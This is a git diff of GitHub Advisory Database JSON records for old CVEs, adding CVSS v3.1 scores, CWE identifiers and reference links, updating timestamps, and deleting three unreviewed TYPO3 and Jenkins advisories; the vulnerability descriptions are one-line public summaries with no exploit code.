--- a/advisories/unreviewed/2022/04/GHSA-h6vw-m287-cx84/GHSA-h6vw-m287-cx84.json +++ b/advisories/unreviewed/2022/04/GHSA-h6vw-m287-cx84/GHSA-h6vw-m287-cx84.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h6vw-m287-cx84", - "modified": "2022-04-30T18:18:05Z", + "modified": "2024-02-08T21:30:28Z", "published": "2022-04-30T18:18:05Z", "aliases": [ "CVE-2001-1452" ], "details": "By default, DNS servers on Windows NT 4.0 and Windows 2000 Server cache glue records received from non-delegated name servers, which allows remote attackers to poison the DNS cache via spoofed DNS responses.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ @@ -22,6 +25,10 @@ "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/3675" }, + { + "type": "WEB", + "url": "http://support.microsoft.com/default.aspx?scid=KB%3Ben-us%3Bq241352" + }, { "type": "WEB", "url": "http://support.microsoft.com/default.aspx?scid=KB;en-us;q241352" @@ -37,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-346" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-h92h-m4pr-cxfx/GHSA-h92h-m4pr-cxfx.json b/advisories/unreviewed/2022/04/GHSA-h92h-m4pr-cxfx/GHSA-h92h-m4pr-cxfx.json index 90216cc17ce81..b6cd20d4d412d 100644 --- a/advisories/unreviewed/2022/04/GHSA-h92h-m4pr-cxfx/GHSA-h92h-m4pr-cxfx.json +++ b/advisories/unreviewed/2022/04/GHSA-h92h-m4pr-cxfx/GHSA-h92h-m4pr-cxfx.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h92h-m4pr-cxfx", - "modified": "2022-04-30T18:17:56Z", + "modified": "2024-02-02T03:30:28Z", "published": "2022-04-30T18:17:56Z", "aliases": [ "CVE-2001-1386" ], "details": "WFTPD 3.00 allows remote attackers to read arbitrary files by uploading a (link) file that ends in a \".lnk.\" extension, which bypasses WFTPD's check for a \".lnk\" extension.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-59" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-hg32-p8hw-8g3x/GHSA-hg32-p8hw-8g3x.json b/advisories/unreviewed/2022/04/GHSA-hg32-p8hw-8g3x/GHSA-hg32-p8hw-8g3x.json index a97e023b3f2a3..8d1cdccbad8e7 100644 --- a/advisories/unreviewed/2022/04/GHSA-hg32-p8hw-8g3x/GHSA-hg32-p8hw-8g3x.json +++ b/advisories/unreviewed/2022/04/GHSA-hg32-p8hw-8g3x/GHSA-hg32-p8hw-8g3x.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hg32-p8hw-8g3x", - "modified": "2022-04-29T02:57:28Z", + "modified": "2024-02-08T03:32:43Z", "published": "2022-04-29T02:57:28Z", "aliases": [ "CVE-2004-0285" ], "details": "PHP remote file inclusion vulnerabilities in include/footer.inc.php in (1) AllMyVisitors, (2) AllMyLinks, and (3) AllMyGuests allow remote attackers to execute arbitrary PHP code via a URL in the _AMVconfig[cfg_serverpath] parameter.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -53,6 +56,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-829", "CWE-94" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2022/04/GHSA-hmpx-mhc7-wxwr/GHSA-hmpx-mhc7-wxwr.json b/advisories/unreviewed/2022/04/GHSA-hmpx-mhc7-wxwr/GHSA-hmpx-mhc7-wxwr.json index 769b90713703e..4cd998f2cc6d3 100644 
--- a/advisories/unreviewed/2022/04/GHSA-hmpx-mhc7-wxwr/GHSA-hmpx-mhc7-wxwr.json +++ b/advisories/unreviewed/2022/04/GHSA-hmpx-mhc7-wxwr/GHSA-hmpx-mhc7-wxwr.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hmpx-mhc7-wxwr", - "modified": "2022-04-30T18:21:00Z", + "modified": "2024-02-02T03:30:30Z", "published": "2022-04-30T18:21:00Z", "aliases": [ "CVE-2002-1347" ], "details": "Multiple buffer overflows in Cyrus SASL library 2.1.9 and earlier allow remote attackers to cause a denial of service and possibly execute arbitrary code via (1) long inputs during user name canonicalization, (2) characters that need to be escaped during LDAP authentication using saslauthd, or (3) an off-by-one error in the log writer, which does not allocate space for the null character that terminates a string.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -73,7 +76,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-131" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-hq7h-vj5v-frp8/GHSA-hq7h-vj5v-frp8.json b/advisories/unreviewed/2022/04/GHSA-hq7h-vj5v-frp8/GHSA-hq7h-vj5v-frp8.json index b6d2016632497..dc95d5f40f462 100644 --- a/advisories/unreviewed/2022/04/GHSA-hq7h-vj5v-frp8/GHSA-hq7h-vj5v-frp8.json +++ b/advisories/unreviewed/2022/04/GHSA-hq7h-vj5v-frp8/GHSA-hq7h-vj5v-frp8.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-hq7h-vj5v-frp8", - "modified": "2022-04-30T18:22:26Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-04-30T18:22:26Z", "aliases": [ "CVE-2002-2067" ], "details": "East-Tec Eraser 2002 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ 
@@ -45,7 +48,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-459" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-j628-384g-rmgc/GHSA-j628-384g-rmgc.json b/advisories/unreviewed/2022/04/GHSA-j628-384g-rmgc/GHSA-j628-384g-rmgc.json deleted file mode 100644 index 8723da485937c..0000000000000 --- a/advisories/unreviewed/2022/04/GHSA-j628-384g-rmgc/GHSA-j628-384g-rmgc.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-j628-384g-rmgc", - "modified": "2022-04-21T01:57:46Z", - "published": "2022-04-21T01:57:46Z", - "aliases": [ - "CVE-2010-3661" - ], - "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 allows Open Redirection on the backend.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3661" - }, - { - "type": "WEB", - "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" - }, - { - "type": "WEB", - "url": "https://security-tracker.debian.org/tracker/CVE-2010-3661" - }, - { - "type": "WEB", - "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Open_Redirection" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-11-01T18:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/04/GHSA-jj45-jp8r-qcjx/GHSA-jj45-jp8r-qcjx.json b/advisories/unreviewed/2022/04/GHSA-jj45-jp8r-qcjx/GHSA-jj45-jp8r-qcjx.json index 8f3cf4e9942b1..ef0163fab26f9 100644 --- a/advisories/unreviewed/2022/04/GHSA-jj45-jp8r-qcjx/GHSA-jj45-jp8r-qcjx.json +++ b/advisories/unreviewed/2022/04/GHSA-jj45-jp8r-qcjx/GHSA-jj45-jp8r-qcjx.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jj45-jp8r-qcjx", - "modified": "2022-04-30T18:19:45Z", + "modified": "2024-02-03T03:30:26Z", "published": "2022-04-30T18:19:45Z", "aliases": [ "CVE-2002-0704" ], "details": "The Network Address Translation (NAT) capability for Netfilter (\"iptables\") 1.2.6a and earlier leaks translated IP addresses in ICMP error messages.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -45,7 +48,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-212" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-jpc9-rmm6-c6xg/GHSA-jpc9-rmm6-c6xg.json b/advisories/unreviewed/2022/04/GHSA-jpc9-rmm6-c6xg/GHSA-jpc9-rmm6-c6xg.json index ab0389e08a240..5b123961dd770 100644 --- a/advisories/unreviewed/2022/04/GHSA-jpc9-rmm6-c6xg/GHSA-jpc9-rmm6-c6xg.json +++ b/advisories/unreviewed/2022/04/GHSA-jpc9-rmm6-c6xg/GHSA-jpc9-rmm6-c6xg.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jpc9-rmm6-c6xg", - "modified": "2022-04-29T03:00:43Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-04-29T03:00:43Z", "aliases": [ "CVE-2004-2061" ], "details": "RiSearch 1.0.01 and RiSearch Pro 3.2.06 allows remote attackers to use the show.pl script as an open proxy, or read arbitrary local files, by setting the url parameter to a (1) http://, (2) ftp://, or (3) file:// URL.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -49,7 +52,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-918" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-m8cx-f5qj-q68r/GHSA-m8cx-f5qj-q68r.json b/advisories/unreviewed/2022/04/GHSA-m8cx-f5qj-q68r/GHSA-m8cx-f5qj-q68r.json index b418df2ee7cb1..2b11f1916aae8 100644 --- a/advisories/unreviewed/2022/04/GHSA-m8cx-f5qj-q68r/GHSA-m8cx-f5qj-q68r.json 
+++ b/advisories/unreviewed/2022/04/GHSA-m8cx-f5qj-q68r/GHSA-m8cx-f5qj-q68r.json @@ -28,7 +28,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-266" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-m95f-rwpm-5j9f/GHSA-m95f-rwpm-5j9f.json b/advisories/unreviewed/2022/04/GHSA-m95f-rwpm-5j9f/GHSA-m95f-rwpm-5j9f.json index 9be9790ead606..505b9d0fd2a16 100644 --- a/advisories/unreviewed/2022/04/GHSA-m95f-rwpm-5j9f/GHSA-m95f-rwpm-5j9f.json +++ b/advisories/unreviewed/2022/04/GHSA-m95f-rwpm-5j9f/GHSA-m95f-rwpm-5j9f.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-m95f-rwpm-5j9f", - "modified": "2022-04-30T18:15:06Z", + "modified": "2024-02-08T21:30:28Z", "published": "2022-04-30T18:15:06Z", "aliases": [ "CVE-2000-1198" ], "details": "qpopper POP server creates lock files with predictable names, which allows local users to cause a denial of service for other users (lack of mail access) by creating lock files for other mail boxes.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-667" ], "severity": "LOW", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-mmjc-3g2p-897m/GHSA-mmjc-3g2p-897m.json b/advisories/unreviewed/2022/04/GHSA-mmjc-3g2p-897m/GHSA-mmjc-3g2p-897m.json index 216ebfe8a7949..be98324e3dd07 100644 --- a/advisories/unreviewed/2022/04/GHSA-mmjc-3g2p-897m/GHSA-mmjc-3g2p-897m.json +++ b/advisories/unreviewed/2022/04/GHSA-mmjc-3g2p-897m/GHSA-mmjc-3g2p-897m.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mmjc-3g2p-897m", - "modified": "2022-04-29T01:26:36Z", + "modified": "2024-02-02T15:30:25Z", "published": "2022-04-29T01:26:36Z", "aliases": [ "CVE-2003-0545" ], "details": "Double free vulnerability in OpenSSL 0.9.7 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via an SSL client certificate with a certain invalid ASN.1 encoding.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -61,7 +64,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-415" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-mp9h-8rrx-27f5/GHSA-mp9h-8rrx-27f5.json b/advisories/unreviewed/2022/04/GHSA-mp9h-8rrx-27f5/GHSA-mp9h-8rrx-27f5.json index b2475d03eeeb1..87712901d0f7f 100644 --- a/advisories/unreviewed/2022/04/GHSA-mp9h-8rrx-27f5/GHSA-mp9h-8rrx-27f5.json +++ b/advisories/unreviewed/2022/04/GHSA-mp9h-8rrx-27f5/GHSA-mp9h-8rrx-27f5.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mp9h-8rrx-27f5", - "modified": "2022-04-30T18:22:32Z", + "modified": "2024-02-08T03:32:43Z", "published": "2022-04-30T18:22:32Z", "aliases": [ "CVE-2002-2119" ], "details": "Novell eDirectory 8.6.2 and 8.7 use case insensitive passwords, which makes it easier for remote attackers to conduct brute force password guessing.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -33,7 +36,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-178" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-mw47-2hrx-68vv/GHSA-mw47-2hrx-68vv.json b/advisories/unreviewed/2022/04/GHSA-mw47-2hrx-68vv/GHSA-mw47-2hrx-68vv.json index bd5e7f1fa8410..f626def3ccdbc 100644 --- a/advisories/unreviewed/2022/04/GHSA-mw47-2hrx-68vv/GHSA-mw47-2hrx-68vv.json 
+++ b/advisories/unreviewed/2022/04/GHSA-mw47-2hrx-68vv/GHSA-mw47-2hrx-68vv.json @@ -37,7 +37,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-78" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-mx9g-mg46-cf6g/GHSA-mx9g-mg46-cf6g.json b/advisories/unreviewed/2022/04/GHSA-mx9g-mg46-cf6g/GHSA-mx9g-mg46-cf6g.json index 4b15a65395aa9..eee2f80c02161 100644 --- a/advisories/unreviewed/2022/04/GHSA-mx9g-mg46-cf6g/GHSA-mx9g-mg46-cf6g.json +++ b/advisories/unreviewed/2022/04/GHSA-mx9g-mg46-cf6g/GHSA-mx9g-mg46-cf6g.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mx9g-mg46-cf6g", - "modified": "2022-04-30T18:18:09Z", + "modified": "2024-02-08T03:32:42Z", "published": "2022-04-30T18:18:09Z", "aliases": [ "CVE-2001-1496" ], "details": "Off-by-one buffer overflow in Basic Authentication in Acme Labs thttpd 1.95 through 2.20 allows remote attackers to cause a denial of service and possibly execute arbitrary code.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -37,7 +40,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-193" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-p235-73wr-c3m7/GHSA-p235-73wr-c3m7.json b/advisories/unreviewed/2022/04/GHSA-p235-73wr-c3m7/GHSA-p235-73wr-c3m7.json index 21e5b82ac8f88..7a67c4fa2fafa 100644 --- a/advisories/unreviewed/2022/04/GHSA-p235-73wr-c3m7/GHSA-p235-73wr-c3m7.json +++ b/advisories/unreviewed/2022/04/GHSA-p235-73wr-c3m7/GHSA-p235-73wr-c3m7.json 
@@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26357" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/" @@ -29,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5117" diff --git a/advisories/unreviewed/2022/04/GHSA-p78x-93mq-qwqh/GHSA-p78x-93mq-qwqh.json b/advisories/unreviewed/2022/04/GHSA-p78x-93mq-qwqh/GHSA-p78x-93mq-qwqh.json deleted file mode 100644 index d3a93eef0b8a5..0000000000000 --- a/advisories/unreviewed/2022/04/GHSA-p78x-93mq-qwqh/GHSA-p78x-93mq-qwqh.json +++ /dev/null 
@@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-p78x-93mq-qwqh", - "modified": "2022-04-21T01:57:48Z", - "published": "2022-04-21T01:57:48Z", - "aliases": [ - "CVE-2010-3672" - ], - "details": "TYPO3 before 4.3.4 and 4.4.x before 4.4.1 allows XSS in the textarea view helper in an extbase extension.", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3672" - }, - { - "type": "WEB", - "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" - }, - { - "type": "WEB", - "url": "https://security-tracker.debian.org/tracker/CVE-2010-3672" - }, - { - "type": "WEB", - "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#XSS" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": null, - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2019-11-05T20:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/04/GHSA-pchp-c5w8-47gc/GHSA-pchp-c5w8-47gc.json b/advisories/unreviewed/2022/04/GHSA-pchp-c5w8-47gc/GHSA-pchp-c5w8-47gc.json deleted file mode 100644 index 7345169ef527b..0000000000000 --- a/advisories/unreviewed/2022/04/GHSA-pchp-c5w8-47gc/GHSA-pchp-c5w8-47gc.json +++ /dev/null 
@@ -1,51 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-pchp-c5w8-47gc", - "modified": "2022-04-23T00:40:48Z", - "published": "2022-04-23T00:40:48Z", - "aliases": [ - "CVE-2012-0785" - ], - "details": "Hash collision attack vulnerability in Jenkins before 1.447, Jenkins LTS before 1.424.2, and Jenkins Enterprise by CloudBees 1.424.x before 1.424.2.1 and 1.400.x before 1.400.0.11 could allow remote attackers to cause a considerable CPU load, aka \"the Hash DoS attack.\"", - "severity": [ - - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-0785" - }, - { - "type": "WEB", - "url": "https://access.redhat.com/security/cve/cve-2012-0785" - }, - { - "type": "WEB", - "url": "https://jenkins.io/security/advisory/2012-01-12/" - }, - { - "type": "WEB", - "url": "https://security-tracker.debian.org/tracker/CVE-2012-0785" - }, - { - "type": "WEB", - "url": "https://www.cloudbees.com/jenkins-security-advisory-2012-01-12" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2012/01/20/8" - } - ], - "database_specific": { - "cwe_ids": [ - - ], - "severity": "HIGH", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2020-02-24T17:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/04/GHSA-q7jv-7633-9g4x/GHSA-q7jv-7633-9g4x.json b/advisories/unreviewed/2022/04/GHSA-q7jv-7633-9g4x/GHSA-q7jv-7633-9g4x.json index 86a58ee77acc4..b7158049000dc 100644 --- a/advisories/unreviewed/2022/04/GHSA-q7jv-7633-9g4x/GHSA-q7jv-7633-9g4x.json +++ b/advisories/unreviewed/2022/04/GHSA-q7jv-7633-9g4x/GHSA-q7jv-7633-9g4x.json 
@@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-q7jv-7633-9g4x", - "modified": "2022-04-30T18:22:26Z", + "modified": "2024-02-08T21:30:30Z", "published": "2022-04-30T18:22:26Z", "aliases": [ "CVE-2002-2068" ], "details": "Eraser 5.3 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -41,7 +44,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-459" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-q8p7-6fhh-3h44/GHSA-q8p7-6fhh-3h44.json b/advisories/unreviewed/2022/04/GHSA-q8p7-6fhh-3h44/GHSA-q8p7-6fhh-3h44.json index 8750cb1b26d76..74c5a78ed7350 100644 --- a/advisories/unreviewed/2022/04/GHSA-q8p7-6fhh-3h44/GHSA-q8p7-6fhh-3h44.json +++ b/advisories/unreviewed/2022/04/GHSA-q8p7-6fhh-3h44/GHSA-q8p7-6fhh-3h44.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-q8p7-6fhh-3h44", - "modified": "2022-04-29T02:58:55Z", + "modified": "2024-02-08T03:32:43Z", "published": "2022-04-29T02:58:55Z", "aliases": [ "CVE-2004-1083" ], "details": "Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with \".ht\" using alternate capitalization.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } ], "affected": [ @@ -49,7 +52,7 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-178" ], "severity": "MODERATE", "github_reviewed": false, 
diff --git a/advisories/unreviewed/2022/04/GHSA-qcm3-q3pj-vw39/GHSA-qcm3-q3pj-vw39.json b/advisories/unreviewed/2022/04/GHSA-qcm3-q3pj-vw39/GHSA-qcm3-q3pj-vw39.json index 0c041cb32d281..519ab933178a5 100644 --- a/advisories/unreviewed/2022/04/GHSA-qcm3-q3pj-vw39/GHSA-qcm3-q3pj-vw39.json +++ b/advisories/unreviewed/2022/04/GHSA-qcm3-q3pj-vw39/GHSA-qcm3-q3pj-vw39.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-qcm3-q3pj-vw39", - "modified": "2022-04-29T02:58:20Z", + "modified": "2024-02-02T15:30:26Z", "published": "2022-04-29T02:58:20Z", "aliases": [ "CVE-2004-0772" ], "details": "Double free vulnerabilities in error handling code in krb524d for MIT Kerberos 5 (krb5) 1.2.8 and earlier may allow remote attackers to execute arbitrary code.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -69,7 +72,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-415" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/04/GHSA-qfqh-96cv-x4mp/GHSA-qfqh-96cv-x4mp.json b/advisories/unreviewed/2022/04/GHSA-qfqh-96cv-x4mp/GHSA-qfqh-96cv-x4mp.json index 9d92dbd4691ed..85d204465a706 100644 --- a/advisories/unreviewed/2022/04/GHSA-qfqh-96cv-x4mp/GHSA-qfqh-96cv-x4mp.json +++ b/advisories/unreviewed/2022/04/GHSA-qfqh-96cv-x4mp/GHSA-qfqh-96cv-x4mp.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-26360" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6ETPM2OVZZ6KOS2L7QO7SIW6XWT5OW3F/" 
@@ -29,6 +37,10 @@
 "type": "WEB",
 "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UHFSRVLM2JUCPDC2KGB7ETPQYJLCGBLD/"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.gentoo.org/glsa/202402-07"
+ },
 {
 "type": "WEB",
 "url": "https://www.debian.org/security/2022/dsa-5117"
diff --git a/advisories/unreviewed/2022/04/GHSA-qhg9-6pfj-f2hv/GHSA-qhg9-6pfj-f2hv.json b/advisories/unreviewed/2022/04/GHSA-qhg9-6pfj-f2hv/GHSA-qhg9-6pfj-f2hv.json
index ab952569b9871..81d34cb95e5e1 100644
--- a/advisories/unreviewed/2022/04/GHSA-qhg9-6pfj-f2hv/GHSA-qhg9-6pfj-f2hv.json
+++ b/advisories/unreviewed/2022/04/GHSA-qhg9-6pfj-f2hv/GHSA-qhg9-6pfj-f2hv.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qhg9-6pfj-f2hv",
- "modified": "2022-04-29T03:00:19Z",
+ "modified": "2024-02-08T21:30:30Z",
 "published": "2022-04-29T03:00:19Z",
 "aliases": [
 "CVE-2004-1842"
 ],
 "details": "Cross-site request forgery (CSRF) vulnerability in Php-Nuke 6.x through 7.1.0 allows remote attackers to gain administrative privileges via an img tag with a URL to admin.php.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -37,7 +40,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-352"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/04/GHSA-qr34-449v-3mf6/GHSA-qr34-449v-3mf6.json b/advisories/unreviewed/2022/04/GHSA-qr34-449v-3mf6/GHSA-qr34-449v-3mf6.json
index 73b71a03d142a..a0a4bd8d8fe06 100644
--- a/advisories/unreviewed/2022/04/GHSA-qr34-449v-3mf6/GHSA-qr34-449v-3mf6.json
+++ b/advisories/unreviewed/2022/04/GHSA-qr34-449v-3mf6/GHSA-qr34-449v-3mf6.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qr34-449v-3mf6",
- "modified": "2022-04-30T18:21:59Z",
+ "modified": "2024-02-08T18:30:37Z",
 "published": "2022-04-30T18:21:59Z",
 "aliases": [
 "CVE-2002-1844"
 ],
 "details": "Microsoft Windows Media Player (WMP) 6.3, when installed on Solaris, installs executables with world-writable permissions, which allows local users to delete or modify the executables to gain privileges.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
@@ -33,7 +36,7 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-276"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2022/04/GHSA-r698-fc6p-rp6g/GHSA-r698-fc6p-rp6g.json b/advisories/unreviewed/2022/04/GHSA-r698-fc6p-rp6g/GHSA-r698-fc6p-rp6g.json
index d558ff8748fb9..de56fb0f85a10 100644
--- a/advisories/unreviewed/2022/04/GHSA-r698-fc6p-rp6g/GHSA-r698-fc6p-rp6g.json
+++ b/advisories/unreviewed/2022/04/GHSA-r698-fc6p-rp6g/GHSA-r698-fc6p-rp6g.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-r698-fc6p-rp6g",
- "modified": "2022-04-30T18:16:11Z",
+ "modified": "2024-02-08T18:30:37Z",
 "published": "2022-04-30T18:16:11Z",
 "aliases": [
 "CVE-2001-0497"
 ],
